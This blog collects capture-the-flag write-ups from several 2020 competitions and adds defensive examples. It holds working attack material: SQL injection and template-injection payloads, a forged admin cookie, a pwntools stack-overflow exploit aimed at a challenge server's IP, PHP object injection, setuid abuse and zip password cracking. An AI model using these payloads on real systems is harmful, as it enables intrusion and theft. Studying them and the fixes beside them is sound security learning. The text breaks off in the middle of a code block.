kanyewest CTF

Notes on things I have studied.

PeaCTF 2020: Write up

Web Exploitation

Eff-twelve

Just look at the source code.

<!--FLAG: peaCTF{b3a96a5c-71df-455d-8035-0df702546173}-->

Bots

Accessing /robots.txt gives:

User-agent: *
Sitemap: /sitemap.xml

Accessing /sitemap.xml gives:

<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<script/>
<script/>
<url>
<loc>/index.html</loc>
<lastmod>2019-04-10T09:51:57+06:00</lastmod>
</url>
<url>
<loc>/97FXwpouwwbmrt7dqxf53AEbiQkmuazB.html</loc>
<lastmod>2019-04-10T09:51:57+06:00</lastmod>
</url>
</urlset>

Accessing /97FXwpouwwbmrt7dqxf53AEbiQkmuazB.html gives the flag.

Secure Admin

POSTing username='+OR+1=1#&password=' gives:

HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Sat, 24 Oct 2020 11:34:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.0RC6
Content-Length: 81

Login success. Welcome! Your flag is peaCTF{2be8b136-325a-40ff-a6b3-6cb1dba72c96}
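
To show the root cause and the fix behind this login bypass, here is an added example (my own code, not the challenge's backend) that assembles the same kind of concatenated query against an in-memory SQLite table and contrasts it with a parameterised query. The table, the credentials and the password value are constructed; SQLite does not accept MySQL's # comment, so the probe below uses the -- comment form instead.

```python
import sqlite3

def make_db():
    """Constructed demo table: one admin row with a made-up password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn

def login_vulnerable(conn, username, password):
    # Query text is assembled from user input, the pattern behind the
    # challenge: a quote in `username` closes the string literal and a SQL
    # comment discards the password check, so the WHERE clause ends up as
    # username='' OR 1=1, which matches every row.
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False   # a syntax error is a failed login, not a crash

def login_safe(conn, username, password):
    # Placeholders keep the input as data: the quote and the comment are
    # compared against column contents and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    probe = "' OR 1=1-- "
    conn = make_db()
    print("vulnerable:", login_vulnerable(conn, probe, ""))  # True
    print("safe:      ", login_safe(conn, probe, ""))        # False
```

The plaintext password column is only there to keep the example short; a real login table stores a salted hash and the parameterised query compares against that.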

Secure Admin 2

POST /login.php HTTP/1.1
Host: 45.32.128.108:28064
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://45.32.128.108:28064
Connection: close
Referer: http://45.32.128.108:28064/
Cookie: _auth=WVdSdGFXNDZabUZzYzJVPQ==
Upgrade-Insecure-Requests: 1

username=admin&password=admin

The value of the _auth cookie is base64-encoded, which looks suspicious, so:

$ echo -n 'WVdSdGFXNDZabUZzYzJVPQ==' | base64 -d | base64 -d
admin:false

So:

$ echo -n 'admin:true' | base64 | base64
WVdSdGFXNDZkSEoxWlE9PQo=

Just POST with this value in the cookie.

flaskookies

There is a server-side template injection vulnerability;

POSTing name={{+config+}} returns:

<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': b'\x7f:&\xcaKu\x9c\x88\x00S\xd3wC\x01"\xaa\xbf\xec8H{|9\xe7', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days=31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'session', 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(seconds=43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093, 'flag': 'peaCTF{61c3d4bc-bb7f-451a-80aa-d6bc485b6e4e}\n'}>.1

a response that contains the flag.
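
The bug behind this challenge is the user value ending up inside the template source rather than being passed in as a template variable. The following is an added example (my code, not the challenge's or Flask's; it assumes Jinja2, Flask's template engine, is installed) that renders the same greeting both ways: the vulnerable form evaluates whatever expression the user sends, the safe form treats it as data.

```python
from jinja2 import Environment  # Jinja2 is Flask's template engine (assumed installed)

env = Environment(autoescape=True)

def greet_vulnerable(name):
    # The user-controlled value becomes part of the template SOURCE, so Jinja
    # evaluates any {{ ... }} it contains. This is what happens with
    # render_template_string("Hello " + name) or an f-string template.
    return env.from_string("Hello " + name + "!").render()

def greet_safe(name):
    # The value is passed as a template VARIABLE: it is rendered as data,
    # expressions inside it are never evaluated, and autoescape handles HTML.
    return env.from_string("Hello {{ name }}!").render(name=name)

if __name__ == "__main__":
    probe = "{{ 7 * 7 }}"
    print(greet_vulnerable(probe))  # Hello 49!
    print(greet_safe(probe))        # Hello {{ 7 * 7 }}!
```

When reviewing Flask code, the thing to grep for is render_template_string (or Environment.from_string) whose argument is built by concatenation, % formatting or an f-string from request data; the fix is always to move that data into the render() keyword arguments.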

Misc

Corrupt

$ file filetype.txt
filetype.txt: PNG image data, 848 x 242, 8-bit/color RGBA, non-interlaced
$ mv filetype.txt filetype.png

General Skills

Warm-up 0

Connect with ssh:

$ ssh peactf@45.32.128.108 -p28058

I was typing commands at random and the flag came out.

peactf@24414320bbe0:~/warm-up-1$ cat */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*
cat: …: Is a directory
peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}cat: …: Is a directory
peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}peaCTF{0307e8c9-28f3-4eb0-b477-8f894ea099ad}cat: f5ad680e0142e8f0834325b61feceee7/55ac7c6cad407189c37d25f0d31c4af0/66ee00647434e499e11532be9f7225a4/87970f657f63eb2624b5a149b4d4c99f/d338cf937923618f103ce9d0186da1a0/2b2d393c32bef3ca9461ac6edd279289/4d7d7ee378382a2164ab5168826a002e/6e670f25e01baf7f56868130e131bf25/4edfdd8562c59422dcd2a4b3cc6e3f2c/4cdc6806225fbd266ca5d6da20750ba1/31d58b08c604c14c85814e05fb9c6749/50e578a9617796d83b1b906d61614e7b/5ee0983bc96ebe70d50f8854239e2b51/d6a068548992e87131c4e40f6493f68b/469f14ab42d8f92f8b31eef0c8a2f28c/77882f6d68ccf3f257fb3c0784e8e238/94afaa03edbf1347aca0afba2186579f/33746a4bdfcfe234658b33e910576c27/4e516ed4e7771bfadc06bf3aa7ef704e/fcc1742a517e2d32f16a3f25852c2dbf: Is a directory

CyberYoddha CTF: Write up

Web

Look Closely

Just look at the source code.

Disallow

Just look at /robots.txt.

Something Sw33t

There is an obviously suspicious cookie named "don't look here".

Cookie: don't look here=.eJyVU2tPwjAU_StLP4tsA9QR90EUxMWRQHQvNdh1d6zYDrOHZiP7746pgUhsoGna5tzTnnNvbtfoKs0YFK0R5pQVLRO4D0mK-mcnKGwg1F-j6yLOIoqlby7qP61RAClJ6HtGV_GGIQW02fz5HPVRTAmgqqqfYHixH_a5Jjuq1cXORHbtntxQY8xhn_pHuaqZB2iDLlB3-aj0HtzaASudzkQhY4P59qMucDFeJZjAESainONY4GGD6k3of9HnXJZDbbMC2Z5DvINcNKu_gwRb_AcJ925BV2mfqu1Lpf2qtLvqIflkEUjijKYKu7GG3rl5m4WmpZWebYVga4qjKhHYBnM67COwtIhwKyQ1RuKZJkh-RsnbEfUuAILfuRkCo8HY6DnqKHZtlgsM3EMM0gDnKV5AcoiFPOJc1PPLwWddE-ZNdVGnGbiodU2cpNFBfUYjKhYN3eVAJoq2Mjt3pUB4WP91utviL1X1BXD8TWE.X4ovdw.rz4sSG_k2heOMf7Cw_C6Kliw7Ms
$ pip3 install flask-unsign
$ flask-unsign --decode --cookie '.eJyVU2tPwjAU_StLP4tsA9QR90EUxMWRQHQvNdh1d6zYDrOHZiP7746pgUhsoGna5tzTnnNvbtfoKs0YFK0R5pQVLRO4D0mK-mcnKGwg1F-j6yLOIoqlby7qP61RAClJ6HtGV_GGIQW02fz5HPVRTAmgqqqfYHixH_a5Jjuq1cXORHbtntxQY8xhn_pHuaqZB2iDLlB3-aj0HtzaASudzkQhY4P59qMucDFeJZjAESainONY4GGD6k3of9HnXJZDbbMC2Z5DvINcNKu_gwRb_AcJ925BV2mfqu1Lpf2qtLvqIflkEUjijKYKu7GG3rl5m4WmpZWebYVga4qjKhHYBnM67COwtIhwKyQ1RuKZJkh-RsnbEfUuAILfuRkCo8HY6DnqKHZtlgsM3EMM0gDnKV5AcoiFPOJc1PPLwWddE-ZNdVGnGbiodU2cpNFBfUYjKhYN3eVAJoq2Mjt3pUB4WP91utviL1X1BXD8TWE.X4ovdw.rz4sSG_k2heOMf7Cw_C6Kliw7Ms'
{'Astley-Family-Members': 6, 'family': {'Cynthia Astley': [{'description': {' di': {' b__': 'nice'}}, 'flag': {' di': {' b__': 'bm90X2V4aXN0YW50'}}, 'name': {' di': {' b__': 'Cynthia Astley'}}}, {'description': {' di': {' b__': 'nicee='}}, 'flag': {' di': {' b__': 'YmFzZTY0X2lzX3N1cHJlbWU='}}, 'name': {' di': {' b__': 'Horace Astley'}}}, {'description': {' di': {' b__': 'human'}}, 'flag': {' di': {' b__': 'flag=flag'}}, 'name': {' di': {' b__': 'ùìùúìøûìýøìÿúìþ41/.2/<1/`1/42'}}}, {'description': {' di': {' b__': 'the man'}}, 'flag': {' di': {' b__': 'Q1lDVEZ7MGtfMV9zZWVfeW91X21heWJlX3lvdV9hcmVfc21hcnR9'}}, 'name': {' di': {' b__': 'Rick Astley'}}}, {'description': {' di': {' b__': 'yeedeedeedeeeeee'}}, 'flag': {' di': {' b__': 'dHJ5X2FnYWlu'}}, 'name': {' di': {' b__': 'Lene Bausager'}}}, {'description': {' di': {' b__': 'uhmm'}}, 'flag': {' di': {' b__': 'bjBwZWVlZQ=='}}, 'name': {' di': {' b__': 'Jayne Marsh'}}}, {'description': {' di': {' b__': 'hihi'}}, 'flag': {' di': {' b__': 'bjBfYjB0c19oM3Iz'}}, 'name': {' di': {' b__': 'Emilie Astley'}}}]}}
$ echo -n 'Q1lDVEZ7MGtfMV9zZWVfeW91X21heWJlX3lvdV9hcmVfc21hcnR9' | base64 -d
CYCTF{0k_1_see_you_maybe_you_are_smart}
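
Both cookie challenges so far (Secure Admin 2's plain base64 admin:false, and this Flask session that flask-unsign reads without knowing the key) come down to one point: encoding is not confidentiality, and without a signature it is not integrity either. The following added example (my code, not Flask's or the challenge's) builds a cookie in Flask's session layout (a leading dot marks a zlib-compressed payload, then base64url timestamp, then base64url MAC), shows that anyone can read the payload without the key, and that flipping admin to true is caught by verification. The signing is simplified (HMAC-SHA256 over the raw secret; itsdangerous derives a salted HMAC-SHA1 key), so signatures are not interchangeable with real Flask cookies, but the payload decoder does work on the cookie captured above, embedded here as PAGE_COOKIE.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# The session cookie captured from the challenge (copied from the request above).
PAGE_COOKIE = (
    ".eJyVU2tPwjAU_StLP4tsA9QR90EUxMWRQHQvNdh1d6zYDrOHZiP7746pgUhsoGna5tzTnnNvbtfoKs0YFK0R5pQVLRO4D0mK-mcnKGwg1F-j6yLOIoqlby7qP61RAClJ6HtGV_GGIQW02fz5HPVRTAmgqqqfYHixH_a5Jjuq1cXORHbtntxQY8xhn_pHuaqZB2iDLlB3-aj0HtzaASudzkQhY4P59qMucDFeJZjAESainONY4GGD6k3of9HnXJZDbbMC2Z5DvINcNKu_gwRb_AcJ925BV2mfqu1Lpf2qtLvqIflkEUjijKYKu7GG3rl5m4WmpZWebYVga4qjKhHYBnM67COwtIhwKyQ1RuKZJkh-RsnbEfUuAILfuRkCo8HY6DnqKHZtlgsM3EMM0gDnKV5AcoiFPOJc1PPLwWddE-ZNdVGnGbiodU2cpNFBfUYjKhYN3eVAJoq2Mjt3pUB4WP91utviL1X1BXD8TWE"
    ".X4ovdw.rz4sSG_k2heOMf7Cw_C6Kliw7Ms"
)

def b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64d(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def make_session_cookie(data, secret, ts=None):
    """Flask-style layout: '.' + b64(zlib(json)) + '.' + b64(timestamp) + '.' + b64(mac)."""
    ts = int(time.time()) if ts is None else ts
    payload = "." + b64e(zlib.compress(json.dumps(data).encode()))
    stamp = b64e(ts.to_bytes(8, "big").lstrip(b"\x00"))
    signed = payload + "." + stamp
    mac = hmac.new(secret, signed.encode(), hashlib.sha256).digest()
    return signed + "." + b64e(mac)

def peek_payload(cookie):
    """Read the session data WITHOUT the secret: a signature is not encryption."""
    compressed = cookie.startswith(".")
    raw = b64d(cookie.lstrip(".").split(".")[0])
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)

def verify_session_cookie(cookie, secret):
    """Return the payload only if the MAC matches; None for any forgery or garbage."""
    signed, _, mac = cookie.rpartition(".")
    expected = hmac.new(secret, signed.encode(), hashlib.sha256).digest()
    try:
        ok = hmac.compare_digest(expected, b64d(mac))
    except ValueError:          # malformed base64 in the MAC segment
        return None
    return peek_payload(cookie) if ok else None

if __name__ == "__main__":
    # Anyone holding the cookie can read it; only the server can vouch for it.
    print(peek_payload(PAGE_COOKIE)["Astley-Family-Members"])   # 6
```

Two consequences for the server side: never put anything secret (here, a flag; in real apps, passwords or tokens) into a Flask session, because it is merely signed, and never accept a cookie whose only protection is base64, as the Secure Admin 2 backend did.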

Password Cracking

secure (i think?)

It is just hashed with MD5.

Crack the Zip!

$ fcrackzip flag.zip -D -p ./rockyou.txt -u flag.zip

PASSWORD FOUND!!!!: pw == not2secure
$ unzip flag.zip
Archive:  flag.zip
[flag.zip] flag.txt password:
 extracting: flag.txt
$ cat flag.txt
cyctf{y0u_cr@ck3d_th3_z!p...}

Me, Myself, and I

2412f72f0f0213c98c1f9f6065728da4529000e5c3a2e16c4e1379bd3e13ccf543201eec4eb7b400eb5a6c9b774bf0c0eeda44869e08f3a54a0b13109a7644aa

ISCCTF 2020: Write up

Pwn

stuck

from pwn import *

e = ELF('./chall')
#p = process('./chall')
p = remote('34.84.136.181', 4000)

ret_addr = 0x0040101a           # a lone `ret` gadget, keeps the stack 16-byte aligned before win()
flag_addr = e.symbols['win']    # the function that prints the flag

payload = b'A' * 112            # filler up to the saved return address (no canary, no PIE)
payload += p64(ret_addr)
payload += p64(flag_addr)

p.sendline(payload)
p.interactive()

└─$ python main.py
[*] '/home/kali/ISSCTF2020/stuck/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 34.84.136.181 on port 4000: Done
[*] Switching to interactive mode
What's your name?
> 
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a@, I'm full stuck engineer!!!!!.
ISCCTF{Y0u_kn0w_5t4ck_0v3rfl0w}

Reversing

strings

Just use the strings command.

Web

Greetings

Just look at the source of /js/greet.js.

Yonezer

Looking at the source:

<html>
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="style.css">
</head>
<body>

<?php

function html($string) {
    return htmlspecialchars($string);
}

$flag = file_get_contents("../flag.txt");

class secret{

    public function data(){
        global $flag;
        echo($flag);
    }

}



class share_video{
    public $text="Hello Everone";

    public function data(){
        echo("<h1>" . html($this->text) . "</h1><br>");
        echo("<MARQUEE><h1>Do you like this video &#x1f440;?</h1></MARQUEE>\n");
        $urls = ["https://www.youtube.com/embed/s582L3gujnw","https://www.youtube.com/embed/gJX2iy6nhHc", "https://www.youtube.com/embed/SX_ViT4Ra7k","https://www.youtube.com/embed/Zw_FKq10S8M"];
        $num = rand(0,3);
        $url = $urls[$num];
        echo ("<div id=\"all\"><iframe width=\"1000\" height=\"600\" src=\"". $url . "\"></iframe></div>");

    }
}


$serialized = @$_GET["data"];
$hoge = @unserialize($serialized);
if($hoge){
    $hoge->data();

}
?>
</body>
</html>

You can see the vulnerability: the input is passed to unserialize() as-is, and whatever class comes out has its data() method called.

<?php
class secret{}

$a = new secret();
echo serialize($a);
?>

$ php main.php
O:6:"secret":0:{}

mark damn it

The source code is provided; the Gemfile contains gem "kramdown", "2.2.1".

Searching for that version turns up a vulnerability that apparently allows reading arbitrary files and executing arbitrary code.

Hacktober CTF: Write up

The SQL challenges were really just plain SQL, so I wanted to solve them all, but the CTF had ended before I noticed.

Linux

Talking to the Dead 1

luciafer@a4e8c21f2f51:/$ cd ~
luciafer@a4e8c21f2f51:~$ ls -al *
Documents:
total 20
drwxrwxr-x 1 luciafer luciafer 4096 Oct  6 08:36 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct  5 14:54 ..
-rw-rw-r-- 1 luciafer luciafer   47 Oct  6 08:36 .flag2.txt
-rw-rw-r-- 1 luciafer luciafer   47 Oct  5 14:55 flag1.txt

Downloads:
total 12
drwxrwxr-x 2 luciafer luciafer 4096 Oct  5 14:54 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct  5 14:54 ..

Pictures:
total 12
drwxrwxr-x 2 luciafer luciafer 4096 Oct  5 14:54 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct  5 14:54 ..

Videos:
total 12
drwxrwxr-x 2 luciafer luciafer 4096 Oct  5 14:54 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct  5 14:54 ..
luciafer@a4e8c21f2f51:~$ cat ~/Documents/flag1.txt
flag{cb07e9d6086d50ee11c0d968f1e5c4bf1c89418c}

Talking to the Dead 2

luciafer@a4e8c21f2f51:~$ cat ~/Documents/.flag2.txt
flag{728ec98bfaa302b2dfc2f716d3de7869f3eadcbf}

Talking to the Dead 3

luciafer@a4e8c21f2f51:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/local/bin/ouija
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
luciafer@a4e8c21f2f51:/$ /usr/local/bin/ouija ../home/spookyboi/Documents/flag3.txt
flag{445b987b5b80e445c3147314dbfa71acd79c2b67}
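
From the defender's side, the interesting entry in that find output is /usr/local/bin/ouija: a setuid binary outside the stock set is exactly what a periodic audit should flag. The following is an added example (my code, not part of the write-up) that compares setuid binaries against a baseline, using the listing above as constructed input; walk_modes() gathers live the same data that find / -perm -u=s -type f does.

```python
import os
import stat

# Baseline of setuid binaries expected on a stock image. Constructed from the
# distro-provided entries in the listing above; in practice it would come from
# a known-good host or from package manifests.
BASELINE = {
    "/usr/bin/umount", "/usr/bin/passwd", "/usr/bin/mount", "/usr/bin/gpasswd",
    "/usr/bin/su", "/usr/bin/chsh", "/usr/bin/newgrp", "/usr/bin/chfn",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Constructed sample of (path, st_mode) pairs standing in for a live walk.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/bin/su", stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/local/bin/ouija", stat.S_IFREG | stat.S_ISUID | 0o755),  # the odd one out
    ("/usr/bin/ls", stat.S_IFREG | 0o755),                          # no setuid bit
    ("/tmp/sock", stat.S_IFSOCK | stat.S_ISUID | 0o755),            # not a regular file
]

def setuid_files(entries):
    """Regular files with the setuid bit set, like `find / -perm -u=s -type f`."""
    return sorted(path for path, mode in entries
                  if stat.S_ISREG(mode) and mode & stat.S_ISUID)

def unexpected_setuid(entries, baseline=BASELINE):
    """Setuid files that are not in the baseline: review or alert on these."""
    return [path for path in setuid_files(entries) if path not in baseline]

def walk_modes(root="/"):
    """Live collection: yields (path, st_mode) without following symlinks."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue   # unreadable or vanished entry; skip it

if __name__ == "__main__":
    for path in unexpected_setuid(SAMPLE_ENTRIES):
        print("unexpected setuid binary:", path)   # /usr/local/bin/ouija
```

Running unexpected_setuid(walk_modes()) as root from cron and diffing against the previous run turns this into a cheap host-integrity check; a new setuid file is worth a ticket regardless of how it got there.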

Talking to the Dead 4

luciafer@a4e8c21f2f51:/$ /usr/local/bin/ouija flag4.txt
flag{4781cbffd13df6622565d45e790b4aac2a4054dc}

SQL

Past Demons

sqlite> .tables
passwd  users
sqlite> select * from passwd;
1|4E6C0DBCCA0E45C805CE753C5974B3F9|1
2|8D302A5C9E06C8A6A52778A09583FD2C|2
3|3AC0D175A50406327CBE0BA0C6675892|3
4|6D5A4277C1F826D5EAAF08F63AEC84C5|4
5|CDF78099FBBBB52BE1AAA086D60289BC|5
6|66E85956792A2BEE9AA95B6F2662297F|6
7|EF468A19E03DDFD6D91ACF6602F71AF9|7
8|59DEA36D05AACAA547DE42E9956678E7|8
9|EB62D05A31866DFF8EC4EF28BAEF9377|9
10|2E8FF4B113C64A3C4B3F9D53AB1F0C53|10
sqlite> select * from users;
1|manage.po1nt|
2|carriage_5enior241|
3|s7r3am5ilver708|
4|MAL1A.PURS3LL|
5|monarch.kne3|
6|d1sp1ay.5hrink1484|
7|f1awed4unt1274|
8|spookyboi|
9|ankle_r3vive|
10|5ay_crosswalk1719|

59DEA36D05AACAA547DE42E9956678E7 is an MD5 hash, so just look it up on any online hash-lookup site.

Body Count

def main():
    data = ""  # the comma-separated row data from the MySQL dump file (omitted on the page)
    d = data.split(',')
    for i in range(len(d)):
        if 'HAVRON' in d[i]:
            print(i)
    print(d[579:600])

if __name__ == "__main__":
    main()

(base) 0:11 ~/CTF $ python3 main.py
579
(base) 0:12 ~/CTF $ python3 main.py
579
["'HAVRON'", "'R'", "'luc1afer.h4vr0n@shallowgraveu.com'", "'2991 Y Alley'", "'Broken Bow'", '38', "'27856'", "'f'", "'1987-12-13')", '(50', "'cast.pipe9065'", "'RICH'", "'KUCUK'", "'S'", "'cast.pipe9065@zellox.net'", "'664 Papaya Ln'", "'Charlestown'", '34', "'3603'", "'m'", "'1985-05-17')"]

Null and Void

$ mysql -u root -p testdb < ./shallowgraveu.sql
mysql> show columns from users;
+----------+-------------+------+-----+---------+----------------+
| Field    | Type        | Null | Key | Default | Extra          |
+----------+-------------+------+-----+---------+----------------+
| user_id  | int         | NO   | PRI | NULL    | auto_increment |
| username | varchar(52) | NO   | UNI | NULL    |                |
| first    | varchar(52) | NO   |     | NULL    |                |
| last     | varchar(52) | NO   |     | NULL    |                |
| middle   | varchar(24) | YES  |     | NULL    |                |
| email    | varchar(52) | NO   | UNI | NULL    |                |
| street   | varchar(52) | NO   |     | NULL    |                |
| city     | varchar(52) | NO   |     | NULL    |                |
| state_id | int         | NO   | MUL | NULL    |                |
| zip      | varchar(10) | NO   |     | NULL    |                |
| gender   | varchar(8)  | NO   |     | NULL    |                |
| dob      | date        | NO   |     | NULL    |                |
+----------+-------------+------+-----+---------+----------------+
12 rows in set (0.01 sec)

DarkCTF: Write up

Web

Source

Looking at the source file:

<html>
    <head>
        <title>SOURCE</title>
        <style>
            #main {
    height: 100vh;
}
        </style>
    </head>
    <body><center>
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<?php
$web = $_SERVER['HTTP_USER_AGENT'];
if (is_numeric($web)){
      if (strlen($web) < 4){
          if ($web > 10000){
                 echo ('<div class="w3-panel w3-green"><h3>Correct</h3>
  <p>darkCTF{}</p></div>');
          } else {
                 echo ('<div class="w3-panel w3-red"><h3>Wrong!</h3>
  <p>Ohhhhh!!! Very Close  </p></div>');
          }
      } else {
             echo ('<div class="w3-panel w3-red"><h3>Wrong!</h3>
  <p>Nice!!! Near But Far</p></div>');
      }
} else {
    echo ('<div class="w3-panel w3-red"><h3>Wrong!</h3>
  <p>Ahhhhh!!! Try Not Easy</p></div>');
}
?>
</center>
<!-- Source is helpful -->
    </body>
</html>

if (is_numeric($web)){ if (strlen($web) < 4){ if ($web > 10000){

So the User-Agent must be numeric, at most 3 characters long, and greater than 10000 for the flag to appear.

Looking into is_numeric, I realized that using e (exponent notation) works. With 1e6 it should presumably be treated as 10^6??

GET / HTTP/1.1
Host: source.darkarmy.xyz
User-Agent: 1e6
<h3>Correct</h3>
  <p>darkCTF{changeing_http_user_agent_is_easy}</p>

Apache Logs

I was given Apache logs. Skimming through them I found a part where someone tries SQLi, and since it uses fromCharCode I guessed they were building a string out of ASCII codes to bypass a WAF.

$ cat logs.ctf | grep "fromCharCode"
192.168.32.1 - - [29/Sep/2015:03:37:34 -0400] "GET /mutillidae/index.php?page=user-info.php&username=%27+union+all+select+1%2CString.fromCharCode%28102%2C+108%2C+97%2C+103%2C+32%2C+105%2C+115%2C+32%2C+83%2C+81%2C+76%2C+95%2C+73%2C+110%2C+106%2C+101%2C+99%2C+116%2C+105%2C+111%2C+110%29%2C3+--%2B&password=&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 9582 "http://192.168.32.134/mutillidae/index.php?page=user-info.php&username=something&password=&user-info-php-submit-button=View+Account+Details" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
192.168.32.1 - - [29/Sep/2015:03:39:46 -0400] "GET /mutillidae/index.php?page=client-side-control-challenge.php HTTP/1.1" 200 9197 "http://192.168.32.134/mutillidae/index.php?page=user-info.php&username=%27+union+all+select+1%2CString.fromCharCode%28102%2C%2B108%2C%2B97%2C%2B103%2C%2B32%2C%2B105%2C%2B115%2C%2B32%2C%2B68%2C%2B97%2C%2B114%2C%2B107%2C%2B67%2C%2B84%2C%2B70%2C%2B123%2C%2B53%2C%2B113%2C%2B108%2C%2B95%2C%2B49%2C%2B110%2C%2B106%2C%2B51%2C%2B99%2C%2B116%2C%2B49%2C%2B48%2C%2B110%2C%2B125%29%2C3+--%2B&password=&user-info-php-submit-button=View+Account+Details" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
>>> s = "102,108,97,103,32,105,115,32,68,97,114,107,67,84,70,123,53,113,108,95,49,110,106,51,99,116,49,48,110,125"
>>> s.split()
['102,108,97,103,32,105,115,32,68,97,114,107,67,84,70,123,53,113,108,95,49,110,106,51,99,116,49,48,110,125']
>>> s.split(",")
['102', '108', '97', '103', '32', '105', '115', '32', '68', '97', '114', '107', '67', '84', '70', '123', '53', '113', '108', '95', '49', '110', '106', '51', '99', '116', '49', '48', '110', '125']
>>> t = map(int,s.split(","))
>>> t
[102, 108, 97, 103, 32, 105, 115, 32, 68, 97, 114, 107, 67, 84, 70, 123, 53, 113, 108, 95, 49, 110, 106, 51, 99, 116, 49, 48, 110, 125]
>>> result = ''
>>> for i in t:
...     result += chr(i)
...
>>> result
'flag is DarkCTF{5ql_1nj3ct10n}'
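
The same decoding, done as a detection rule rather than by hand, is an added example (my code, not the challenge's): it parses Apache combined-format lines, URL-decodes the request target and Referer, flags union/select and fromCharCode markers, and turns every fromCharCode(...) list back into text so an analyst sees the payload directly. The two suspicious lines are the ones from logs.ctf above; the benign third line is constructed.

```python
import re
from urllib.parse import unquote_plus

# Two suspicious lines copied from the logs.ctf excerpt above, plus one
# constructed benign line for contrast.
SAMPLE_LOG = [
    '192.168.32.1 - - [29/Sep/2015:03:37:34 -0400] "GET /mutillidae/index.php?page=user-info.php&username=%27+union+all+select+1%2CString.fromCharCode%28102%2C+108%2C+97%2C+103%2C+32%2C+105%2C+115%2C+32%2C+83%2C+81%2C+76%2C+95%2C+73%2C+110%2C+106%2C+101%2C+99%2C+116%2C+105%2C+111%2C+110%29%2C3+--%2B&password=&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 9582 "http://192.168.32.134/mutillidae/index.php?page=user-info.php&username=something&password=&user-info-php-submit-button=View+Account+Details" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"',
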